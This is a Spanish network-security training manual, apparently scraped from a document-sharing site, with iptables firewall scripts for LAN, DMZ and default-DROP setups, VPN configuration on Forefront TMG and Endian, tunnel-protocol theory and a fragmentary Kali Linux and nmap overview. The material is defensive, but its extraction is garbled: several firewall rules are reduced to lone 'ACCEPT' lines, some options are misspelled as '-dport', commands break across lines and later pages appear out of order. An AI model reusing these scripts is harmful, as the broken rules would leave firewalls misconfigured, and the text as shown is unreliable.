## Borrando las reglas actuales:
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
## Establecemos política por defecto, que en este caso será aceptar

iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
## Se inicia el Filtro
## El puerto eth0 es la interfaz del Firewall que se encuentra conectada al router
## y eth1 a la LAN (red interna)
iptables -A INPUT -s 192.168.1.0/24 -i eth1 -j ACCEPT
## Enmascaramos todo lo que salga por eth0.
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
## Con esto permitimos hacer forward de paquetes en el firewall, o sea
## que otras máquinas puedan salir a través del firewall.

## Para que tu máquina con Linux (sea este Ubuntu, Debian, Fedora u otro)
## actúe como un ruteador, o como puerta de acceso a internet compartida, pues
## deberás activar el "IP forwarding" en tu computador que actuará como
## ruteador.
## Esto puede realizarse de diferentes maneras, por ejemplo:
## Y ahora debemos cerrar los accesos indeseados del exterior:
iptables -A INPUT -s 0.0.0.0/0 -p tcp -dport 1:1024 -j DROP
iptables -A INPUT -s 0.0.0.0/0 -p udp -dport 1:1024 -j DROP
## Cerramos un puerto de gestión, en este caso el que es utilizado por webmin
iptables -A INPUT -s 0.0.0.0/0 -p tcp -dport 10000 -j DROP
## Fin del script
Firewall de una LAN con salida a Internet con DMZ.
En este tipo de firewall hay que permitir:
 Acceso de la red local a Internet.

 Acceso público al puerto tcp/80 y tcp/443 del servidor de la DMZ
 Acceso del servidor de la DMZ a una BD de la LAN (puede tratarse del
Servidor WEB que realiza consultas a la BD).
 Bloquear el resto de acceso de la DMZ hacia la LAN.
Entre la RED LAN y la red DMZ debe ser reglas FORWARD, ya que estamos
filtrando entre distintas redes, no son paquetes destinados al propio firewall.
El script que nos daría la solución, sería:
## Primero limpiamos las reglas previas
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
## Establecemos la política por defecto en el Firewall



## Se inicial el filtrado
## En este caso, como en el ejemplo anterior, asumiremos que eth0 es el interfaz
## conectado al router y eth1 a la LAN
# Todo lo que venga por el exterior y vaya al puerto 80 lo redirigimos a una
## maquina interna
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to
192.168.1.2:80
# Todo lo que venga por el exterior y vaya al puerto 443 lo redirigimos a una
## maquina interna
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j DNAT --to
192.168.1.2:443
## Al localhost se les permite el acceso a los servicios locales
## Al firewall tenemos acceso desde la red local (Recordemos que el puerto eth1
## está conectada a la LAN).
iptables -A INPUT -s 192.168.1.0/24 -i eth1 -j ACCEPT
## Ahora hacemos enmascaramiento de la red local y de la DMZ para que
## puedan salir hacia el exterior y activamos el BIT DE FORWARDING
## Ahora, debemos permitir que otros equipos puedan salir por el Firewall:
## Permitimos el paso de la DMZ a una BBDD de la LAN:
iptables -A FORWARD -s 192.168.3.2 -d 192.168.1.5 -p tcp --dport 5432 -j
ACCEPT
iptables -A FORWARD -s 192.168.1.5 -d 192.168.3.2 -p tcp --sport 5432 -j
ACCEPT
## permitimos abrir el Terminal server de la DMZ desde la LAN
iptables -A FORWARD -s 192.168.1.0/24 -d 192.168.3.2 -p tcp --sport
1024:65535 --dport 3389 -j ACCEPT

iptables -A FORWARD -s 192.168.3.2 -d 192.168.1.0/24 -p tcp --sport 3389 --

dport 1024:65535 -j ACCEPT
## Cerramos el acceso de la DMZ a la LAN para seguridad

iptables -A FORWARD -s 192.168.3.0/24 -d 192.168.1.0/24 -j DROP
## Cerramos el acceso de la DMZ al propio firewall por seguridad, recordemos
## que el firewall se conecta a la DMZ desde el puerto eth2:
iptables -A INPUT -s 192.168.3.0/24 -i eth2 -j DROP
## Y ahora cerramos los accesos indeseados del exterior:
iptables -A INPUT -s 0.0.0.0/0 -p tcp -dport 1:1024 -j DROP
iptables -A INPUT -s 0.0.0.0/0 -p udp -dport 1:1024 -j DROP
## Cerramos el puerto de gestión de webmin
iptables -A INPUT -s 0.0.0.0/0 -p tcp -dport 10000 -j DROP
# Fin del script
Firewall con política por defecto DROP.
Hasta el momento se ha estado trabajando con una política por defecto “Accept”:
Pero no siempre esto es lo más seguro.
Trabajar con política por defecto DROP es más seguro pero también más
complicado.
Realizaremos el mismo ejemplo que en el caso anterior pero tomando la política
por defecto DROP:
## Borrando las reglas anteriores
iptables -F
iptables -X
iptables -Z
iptables -t nat -F

## Estableciendo la política por defecto: DROP:

iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
## Se inicia el filtro:
## Al Firewall le indicamos que podemos ingresar a este, desde un equipo para
## administración:
iptables -A INPUT -s 210.195.55.20 -j ACCEPT
iptables -A OUTPUT -d 210.195.55.20 -j ACCEPT
## Para el resto de equipos no habría acceso al firewall debido a que esta por
defecto en DROP, en caso contrario tendríamos que haber ingresado:
iptables -A INPUT -s 0.0.0.0/0 -j DROP
## Ahora, ingresamos las reglas para cada servidor, recordemos que los
## paquetes tienen como destino no al firewall, sino otras máquinas por lo cual
## se aplica FORWARD:
## Empezamos con el servidor WEB cuyo IP es 211.34.149.5
# Acceso al puerto 80
iptables -A FORWARD -d 211.34.149.5 -p tcp --dport 80 -j ACCEPT
iptables -A FORWARD -s 211.34.149.5 -p tcp --sport 80 -j ACCEPT
## Permitir el acceso vía SSH desde nuestra máquina al servidor WEB para su
## administración:
ACCEPT
ACCEPT
## Para el caso del Servidor de correo, su IP es: 211.34.149.6
## Acceso a los puertos: 25 (SMTP), 110(POP 3) y 143 (IMAP)


# Permitimos el acceso para la gestión SNMP:
iptables -A FORWARD -s 210.195.55.20 -d 211.34.149.6 -p udp --dport 161 -j
ACCEPT
iptables -A FORWARD -s 211.34.149.6 -d 210.195.55.20 -p udp --sport 161 -j
ACCEPT
# Acceso a nuestra IP para gestionar el servidor de correo
ACCEPT
ACCEPT
## Ahora, accedemos al servidor 211.34.149.10 vía HTTPS
# Acceso para Gestion, con RDP (Protocolo de escritorio remoto)
ACCEPT
ACCEPT
## Servidor CITRIX y de BD 211.34.149.11
# Acceso para gestión

ACCEPT
ACCEPT
# acceso a otro puerto para el servicio de BD: SQL Server
ACCEPT


ACCEPT
iptables -A FORWARD -s 210.195.55.20 -d 211.34.149.11 -p udp --dport 1433 -
j ACCEPT
iptables -A FORWARD -s 211.34.149.11 -d 210.195.55.20 -p udp --sport 1433 -
j ACCEPT
# Fin del script
Como depurar el funcionamiento del Firewall.
Aparte de verificar cada una de las reglas ingresadas, se pueden utilizar algunas
herramientas, tales como:
IPTRAF, NMAP, etc…
1. ¿En que consisten las IPtables y cuáles son sus usos? - Explique
2. ¿Cómo se clasifican las IPtables? – Detalle al especto.
3. ¿Qué ventajas y desventajas tiene el trabajar con IPtables?

TAREA
12
Tarea 12: Implementar una óptima seguridad en las redes VPN con
productos Microsoft y Linux.
Entender el funcionamiento de una red privada virtual.

Configurando VPN para clientes remotos
Configurando el servidor de seguridad para Controlar y administrar las
VPN en entornos Microsoft y Linux.
El que es bueno para argumentar excusas rara vez es bueno para

otra cosa (Benjamín Franklin).

capacidad.
 Entender el funcionamiento de una red privada virtual.

 Configurando VPN para clientes remotos
 Configurando el servidor de seguridad para Controlar y administrar las
TAREA PRÁCTICA:
En primer lugar trabajaremos con una implementación de VPN sobre un
TMG (producto Microsoft).
La topología es la siguiente:
RED Interna:
172.31.2.0/23, Gateway: 172.31.2.1/23.
DNS:
200.48.225.130
200.48.225.146
RED Externa: (INTERNET)

192.168.1.0/24
Gateway: 192.168.1.0
DNS:
200.48.225.130
200.48.225.146
Recordemos, que para este ejercicio, asi como los anteriores, se está tomando
como la red de Internet, la 192.168.1.0/24, pero en otros entornos puedes estar
trabajando directamente con IPs públicos.
El procedimiento es el siguiente:
1. Ingresamos a la consola de administración del TMG:

2. Se dirigirá al panel izquierdo y se ubicará en “Directiva de acceso remoto

(VPN)”.
3. Hará clic en “Configurar método de asignación de direcciones”:
Las direcciones
IP para los
equipos que
utilicen la VPN.
4. Hará clic en “Agregar” e ingresará el siguiente rango de direcciones:
5. Haga clic en “Aceptar”.

6. Verifique que se muestre el rango correcto:

7. Verificará que la Autenticación utilice el método MS-CHAPv2.
8. Se ubicará en la ficha “Redes de acceso” y verificará que se encuentre

seleccionada la red “Externa”:

9. Hacemos clic en “Aceptar”.

10. Aplicamos los cambios.
11. Ahora, creará un grupo y ha este grupo debe agregarle el usuario
administrador:
12. Retornará a la consola de administración de TMG.
13. Haga clic en “Comprobar propiedades de VPN”.

14. Defina como máximo número de conexiones VPN: 50:

15. Haga clic en la ficha “Grupos” y adicione el grupo creado anteriormente:

VPN-Senati:
16. Desde la ficha protocolos, verifica que se encuentre habilitado el protocolo

PPTP:
17. Habilite la asignación de usuarios:

18. Acepte los cambios y aplíquelos.

19. Verificamos que estén creadas las reglas que permitan acceder de la LAN
a la WAN.
20. Ahora, se creará una regla de enrutamiento de los clientes VPN hacia la
LAN, para lo cual hará clic secundario en “Redes” luego en “Nuevo” y
finalmente “Regla de red” (ver imagen):
21. Le asignará el nombre: Clientes –VPN:

22. Origen de la regla son los clientes VPN:
23. Como destino, agregará a la red Interna:
24. Indicará que se trata de una ruta:
25. Haga clic en “finalizar” y Aplique

los cambios.
26. Ahora, debe crear una regla de
red con NAT de la red Externa
hacia la Interna:

27. Finalizará la regla y aplicará los cambios:
28. Ahora, creará una regla de acceso de los clientes de VPN hacia la red
interna.
29. Esta nueva regla se llamará “VPN-INTERNA”:

Permitimos todo el tráfico saliente.

Origen: Clientes VPN.
Destino: Red Interna.
30. Ahora, para comprobar la tarea, desde la PC que está en la red WAN
(Internet) creamos la VPN:
31. Utilizamos la conexión a Internet:
32. Colocamos el IP del servidor TMG (de la red Externa):

33. Se ingresa el usuario y contraseña del inicio de sesión:
34. Se creará la conexión VPN:
35. Verificará la entrega del IP por parte del servidor, en este caso:
172.16.0.3.

VPN en entorno Linux- con ENDIAN.
En este caso se realizará la configuración de dos Firewalls Endian (una en cada

sede) y lograr establecer una conexión VPN entre ambas sedes.

Topología:
1. Empezará configurando el Sede1:

2. Primero se creará la máquina virtual donde se instalará el Firewall
ENDIAN para la sede 1, esta máquina debe contar con dos tarjetas de
red:
3. Una vez terminada la instalación, podrá apreciar la siguiente interface de

acceso.
4. Aquí también nos indicará la dirección IP y el puerto para acceder vía https
a la configuración mediante una interfaz gráfica (vía WEB) del firewall:
5. Ingresará a la interfaz WEB y se iniciará la configuración de las redes:

a. Red verde: Red LAN (red interna).
b. Red Naranja (Red DMZ).

c. Red azul (Red inalámbrica).

d. Red Roja (Red WAN o Internet).
6. Se colocarán los IPs correspondientes a cada una de las redes indicadas

anteriormente:
Se configuran
las redes.

Se coloca el IP
para la WAN
(Internet).
7. Se deben configurar las direcciones IP de los servidores DNS:
8. Además, se indicará el correo del usuario administrador del servidor:

9. Terminamos la configuración de las redes.
10. Ahora, procederá a crear una VPN de RED a RED:

11. Creará la VPN, asignándole un nombre, el estado de activado, la subred

local, la sub red remota y la clave.
12. Además debe activar el IPsec.
Se creará la red VPN

ingresando la información
referente a la red remota.
Ahora, debe configurar la Sede 2:

13. Se realiza el mismo procedimiento que se realizó en la Sede 1:

14. Se realizará la configuración de las redes:

a. Verde.
b. Naranja.
c. Azul.
d. Roja.

Estas
configuraciones
son opcionales.

Aplicamos la
configuración
realizada.
15. Creará la conexión VPN, utilizando IPSec y agregando el nombre de la

red, red local, red remota y clave.

Se creará la
Conexión VPN
similar a lo
realizado en la
otra sede.
16. Al final, entre las dos sedes se activará la conexión VPN, ya que pasará
a estado “ABIERTA”:

Se encuentra Abierta
la conexión VPN en la
SEDE 1.
Se encuentra Abierta
la conexión VPN en la
SEDE 2.
17. Ahora, debe configurar un equipo cliente para una sede y probará
conectividad entre ambas sedes.

FUNDAMENTOS TEORICOS:
Entender el funcionamiento de una red privada virtual.
Como ya es conocido, las redes de área local son las redes internas de las
organizaciones. Estas redes LAN se conectan cada vez con más frecuencia a
Internet mediante un equipo de comunicaciones. Muchas veces, en la empresas
necesitan comunicarse entre sedes o sucursales, clientes o incluso con el
personal que puede estar alejado geográficamente. Una forma de lograr esto es
a través de Internet, sin embargo, los datos transmitidos a través de Internet son
mucho más vulnerables que cuando viajan por la red interna de la organización,
ya que existe una alta probabilidad de que atraviese una infraestructura de red
pública que no sea segura por que algún usuario puede estar escuchando la red
y capture la información.
Si se busca una comunicación altamente segura, implicaría conectar redes
remotas mediante líneas dedicadas, pero es una solución de alto costo, sin
embargo, existe otro método mucho más económico pero no tan seguro, este
método consiste en utilizar enlaces vía VPN (Red Privada Virtual), que consiste
en utilizar Internet como medio de transmisión con un protocolo de túnel, que
permitiría que los datos se encapsulen y se cifren antes de ser enviados.
Una red privada virtual se basa en un protocolo denominado protocolo de túnel,

es decir, un protocolo que cifra los datos que se transmiten desde un lado de la
VPN hacia el otro.
En una VPN de dos equipos, el cliente de VPN es la parte que cifra y descifra los
datos del lado del usuario y el servidor VPN (comúnmente llamado servidor de
acceso remoto) es el elemento que descifra los datos del lado de la organización.
Protocolos de túnel
Los principales protocolos de túnel son:

1. PPTP (Protocolo de túnel punto a punto) es un protocolo de capa 2

desarrollado por Microsoft, 3Com, Ascend, US Robotics y ECI Telematics.
2. L2F (Reenvío de capa dos) es un protocolo de capa 2 desarrollado por
Cisco, Northern Telecom y Shiva. Actualmente es casi obsoleto.
3. L2TP (Protocolo de túnel de capa dos), el resultado del trabajo del IETF
(RFC 2661), incluye todas las características de PPTP y L2F. Es un
protocolo de capa 2 basado en PPP.
4. IPSec es un protocolo de capa 3 creado por el IETF que puede enviar
datos cifrados para redes IP.
IPSec se basa en tres módulos:

 Encabezado de autenticación IP (AH), que incluye integridad,
autenticación y protección contra ataques de REPLAY a los
paquetes.
OBSERVACION:
El ataque REPLAY es un tipo de ataque donde una sesión de
autenticación es repetida para hacer creer a la PC que realmente
es un usuario autentificado y así ésta le otorgue el acceso
solicitado, es decir, ganar autentificación de manera fraudulenta.
 Carga útil de seguridad encapsulada (ESP), que define el cifrado
del paquete. ESP brinda privacidad, integridad, autenticación y
protección contra ataques de REPLAY.
 Asociación de seguridad (SA) que define configuraciones de
seguridad e intercambio clave. Las SA incluyen toda la información
acerca de cómo procesar paquetes IP (los protocolos AH y/o ESP,
el modo de transporte o túnel, los algoritmos de seguridad
utilizados por los protocolos, las claves utilizadas, etc.). El
intercambio clave se realiza manualmente o con el protocolo de

intercambio IKE (en la mayoría de los casos), lo que permite que

ambas partes se escuchen entre sí.
Configurando VPN para clientes remotos

Para lograr configurar clientes remotos para que se conecten a través de una
VPN, previamente debe existir un servidor de acceso remoto:
Ahora si mostraremos el
procedimiento para la
configuración de la VPN en el
cliente:
1. Desde el Panel de Control
abra el “Centro de redes y
recursos compartidos”:

2. Seleccione “Configurar una nueva conexión o red”. En la nueva ventana,

escoja “Conectarse a un área de trabajo”:
3. Clic en el botón “Siguiente”. En la nueva ventana escoja “Usar mi conexión

a Internet”:
4. En la siguiente ventana debemos introducir el servidor de VPN, ya sea por

nombre DNS o por dirección IP.
5. Como “Nombre de destino” escoja un
nombre descriptivo.
6. Haga clic en el botón “Crear”.
7. Clic sobre el icono monitor que se
encuentra en la esquina inferior derecha
de la pantalla (área de notificación).
8. Pulse sobre la “Conexión VPN” creada
con el botón derecho del ratón y
seleccione “Propiedades”.
9. Seleccione la pestaña de Seguridad y
configure los parámetros de seguridad
adecuados, por ejemplo:
a. Tipo de VPN: Protocolo de túnel SSTP
b. Cifrado de datos: Requiere cifrado
c. Usar el protocolo de autenticación (EAP): seleccionar EAP
protegido (PEAP) (cifrado habilitado).

10. Pulsamos sucesivamente los botones de “Aceptar” de las ventanas que

han quedado abiertas y nos disponemos a conectar.
11. Pulse sobre la conexión VPN creada y clic sobre “Conectar”:
12. Luego ingresará el usuario y contraseña necesarios:
13. Finalmente aparecerá como “Conectado”.

Configuración de ForeFront TMG para administrar las conexiones VPN:
Forefront TMG proporciona acceso de red privada virtual (VPN) a la red
corporativa interna para los clientes en redes remotas y los clientes móviles que
se conectan a través de Internet.
La Configuración de ForeFront TMG para administrar las conexiones VPN, es:
1. Configurar el acceso VPN de sitio a sitio: Esta configuración describe
cómo crear una conexión VPN a una red remota. Esto permite a los
clientes de la red remota obtener acceso a los recursos de la red

corporativa con una elevada seguridad, a la vez que los clientes de la red
corporativa pueden obtener acceso a los recursos del sitio remoto.
Para lograr esta configuración, se deben tomar en cuenta los siguientes
procedimientos:
 Crear una cuenta de usuario para la puerta de enlace de sitio
remoto:
o En el servidor de Forefront TMG, haga clic en Inicio,
seleccione Herramientas administrativas y, a continuación,
haga clic en Administración de equipos.
o En el árbol de la consola Administración de equipos, haga
clic en Herramientas del sistema, en Usuarios y grupos
locales y, a continuación, en Usuarios.
o En el panel de detalles, haga clic con el botón secundario en
el usuario correspondiente y, a continuación, haga clic en
Propiedades.
o En la ficha Marcado, en Permiso de acceso remoto (acceso
telefónico o red privada virtual), seleccione Permitir acceso.
 Crear una conexión de sitio remoto VPN:
o En el árbol de la consola de administración de Forefront
TMG, haga clic en Directiva de acceso remoto (VPN).
o En el panel de detalles, haga clic en la ficha Sitios remotos.
o En la ficha Tareas, haga clic en Crear conexión VPN de sitio
a sitio.
o En el asistente Crear conexión VPN de sitio a sitio, siga las
instrucciones indicadas.
o Para ver un resumen de la configuración de red VPN de sitio
a sitio, haga clic con el botón secundario en la red
seleccionada y, a continuación, haga clic en Resumen de
sitio a sitio en la ficha Sitios remotos.
 Comprobación de la conectividad VPN de sitio a sitio:
TMG, haga clic en el nodo Supervisión.
o En el panel de detalles, en la ficha Sesiones, compruebe si
aparece su sesión VPN.
o Para crear un filtro de sesión que solo muestre sesiones de
VPN de sitio a sitio, en la ficha Tareas, haga clic en
Modificar filtro.
 Configurar las direcciones para los sitios remotos habilitados con
NLB (Network Load Balancing).
 Configurar la autenticación EAP:

o En el equipo de Forefront TMG, haga clic en Inicio, en

Herramientas administrativas y, a continuación, haga clic en
Enrutamiento y acceso remoto.
o En el complemento Enrutamiento y acceso remoto de MMC,
seleccione el nodo Interfaces de red.
o Cuando haya aplicado los cambios en la configuración de
Forefront TMG, se creará una interfaz de marcado a petición
con el mismo nombre especificado para la red. Seleccione
esta interfaz de marcado a petición y, a continuación, haga
clic en Propiedades.
o En la ficha Seguridad, debería seleccionarse la opción de
configuración avanzada personalizada. Haga clic en
Configuración para abrir la configuración avanzada de
seguridad.
o Seleccione el protocolo de autenticación extensible (EAP)
que va a usar y, a continuación, haga clic en Propiedades
para configurar el protocolo en función del proveedor EAP.
 Finalizar automáticamente las conexiones VPN inactivas:
TMG, haga clic en el nodo Redes privadas virtuales (VPN).
o En el panel de detalles, haga clic en la ficha Sitios remotos
y, a continuación, seleccione la red remota correspondiente
(únicamente las redes PPTP y L2TP).
o En la ficha Tareas, haga clic en Editar red seleccionada.
o En el cuadro de lista Anular conexiones inactivas después
de la ficha Conexión, seleccione el tiempo que puede
permanecer inactiva una sesión antes de anularla.
2. Configurar el acceso VPN de cliente remoto: Esta configuración describe

cómo permitir a los usuarios que trabajan de forma remota conectarse a
la red corporativa a través de Internet con alta seguridad.
Para lograr esta configuración, se deben tomar en cuenta los siguientes
procedimientos:
 Definir clientes de VPN remotos.

 Habilitar el acceso básico al cliente remoto.
 Configurar el acceso de cliente remoto con seguridad mejorada.
 Instalar la herramienta de cuarentena de acceso remoto.
 Configurar un control de cuarentena basado en RQS y RQC.

 Aplicación de los requisitos de mantenimiento de cliente de VPN

con NAP.
VPN en entorno Linux- con ENDIAN.
Para este caso veremos cómo enlazar dos sitios a través de una conexión VPN
entre dos UTM ENDIAN Linux.
El procedimiento es muy sencillo, para lo cual debe realizar los siguientes pasos:
1. Es necesario instalar dos máquinas virtuales con Endian.
2. En cada máquina virtual, se configuran dos adaptadores de red, uno para
la LAN y otro para el canal de la VPN. Este procedimiento se realiza en
cada una de las máquinas.
3. Se colocará en cada ENDIAN, para la conexión LAN (Green) la dirección
IP adecuada para acceder vía WEB.
4. Debemos configurar también a cada equipo de la red LAN, que se
conectarán a través del túnel de la VPN.
5. Ingresaremos al primer Endian (Endian1) para realizar las configuraciones
siguientes:
a. Activar IPsec.
b. Crear la VPN.
6. Primero colocaremos los IP de las redes Wan (red Roja), en este caso se
colocará 200.10.10.5.

7. Luego nos ubicamos en el menú VPN, luego en la opción “IPsec” y

haremos clic en la casilla de verificación “Activado”:
8. Luego crearemos la nueva conexión VPN, haciendo clic en el botón

“Añadir”, como se indica en la imagen:
9. Aquí colocaremos la información referente al tipo de conexión:

a. VPN tipo Host-to –Net.
b. Red a Red “Red Privada Virtual”.
10. Escogerá Red a Red “Red Privada Virtual”:

11. Presione el botón “Añadir”.

12. Ahora especificamos la subred local y la subred remota:
13. Realizar el mismo procedimiento con el Endian2 del Site2.
1. ¿Qué tan segura es una conexión vía VPN?- Explique.

2. ¿Qué protocolos permiten establecer una conexión vía VPN?.
3. ¿Qué implementación sería más eficiente a su parecer, para lograr mayor
seguridad en una comunicación de site a site via VPN?- Explique.


Manual de Seguridad de Redes II

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Manual de Seguridad de Redes II

Uploaded by

Copyright:

Available Formats

TABLA DE CONTENIDO:

TAREA 01 ENTENDER LA IMPORTANCIA DE LA SEGURIDAD EN LA EMPRESA. ............. 5

TAREA 05: IMPLEMENTAR LA ÓPTIMA CONFIGURACIÓN DE LA CACHE DEL

Escuela de Tecnologías de la Información 2

ADMINISTRAR LA SUPERVISIÓN DE SESIONES ....................................................... 193

Escuela de Tecnologías de la Información 3

CONFIGURANDO VPN PARA CLIENTES REMOTOS .................................................. 268

Escuela de Tecnologías de la Información 4

En esta tarea realizará las siguientes operaciones:

 Evaluar el nivel de seguridad de la red de datos en una empresa.

 “El éxito no es la clave de la felicidad. La felicidad es la clave del

 Computadora con microprocesadores core 2 Duo ó de mayor capacidad.

 Evaluar el nivel de seguridad de la red de datos en una empresa.

Kali Linux contiene una

Kali Linux tiene las siguientes características:

 Contiene una diversidad de herramientas de Pruebas de Penetración.

Escuela de Tecnologías de la Información 6

 Árbol Git Open Source.

acccheck enum4linux p0f

Escuela de Tecnologías de la Información 7

3. Los ataques inalámbricos:

Escuela de Tecnologías de la Información 8

6. Herramientas de análisis forense:

Binwalk chntpw ddrescue

Escuela de Tecnologías de la Información 9

Dumpzilla iPhone Backup pdgmail

Si desease más información puede ingresar a la siguiente fuente:

Una de las herramientas más importantes es NMAP:

Nmap utiliza el siguiente formato:

Escuela de Tecnologías de la Información 10

nmap [Tipo(s) de Análisis] [Opciones] {especificación de objetivos}

Desde esta página

Escuela de Tecnologías de la Información 11

2. Luego creará una máquina virtual, utilizando VMware.

5. Indicará el tipo de máquina virtual:

Indicará que tipo de

6. Indicará la ubicación en la cual se guardará la máquina virtual:

Escuela de Tecnologías de la Información 12

Indicará la ruta en la que

7. Indicará la capacidad del disco duro:

Indicará la capacidad del

8. Realizará las configuraciones de red adecuadas, si no se tiene una red

Debe configurar la tarjeta

Escuela de Tecnologías de la Información 13

9. Se colocará la ruta en la cual se encuentra el ISO de Kali:

10. Se incrementará la memoria para la máquina virtual:

11. Iniciará la máquina virtual:

12. Seleccione la opción de instalación grafica (Graphical install).

Escuela de Tecnologías de la Información 14

16. Debe indicar su ubicación, en este caso seleccionará “Perú”:

Escuela de Tecnologías de la Información 15

17. Realizará la configuración del teclado, en este caso escogerá

18. El equipo tratará de recibir una configuración IP desde un servidor DHCP,

19. En este caso, debe configurar la red de forma manual, colocando la

En este ejemplo, se realizará la

Escuela de Tecnologías de la Información 16

21. Ahora ingresará la puerta de enlace:

Desde esta ubicación se irán colocando la

23. Se realiza un testeo de red inicial:

24. Ingresará el nombre del servidor, en este caso se le colocará de nombre:

25. Se colocará el nombre de dominio de la empresa:

Escuela de Tecnologías de la Información 17

26. Se ingresará la contraseña del usuario principal (usuario root):

Aquí se ingresará la contraseña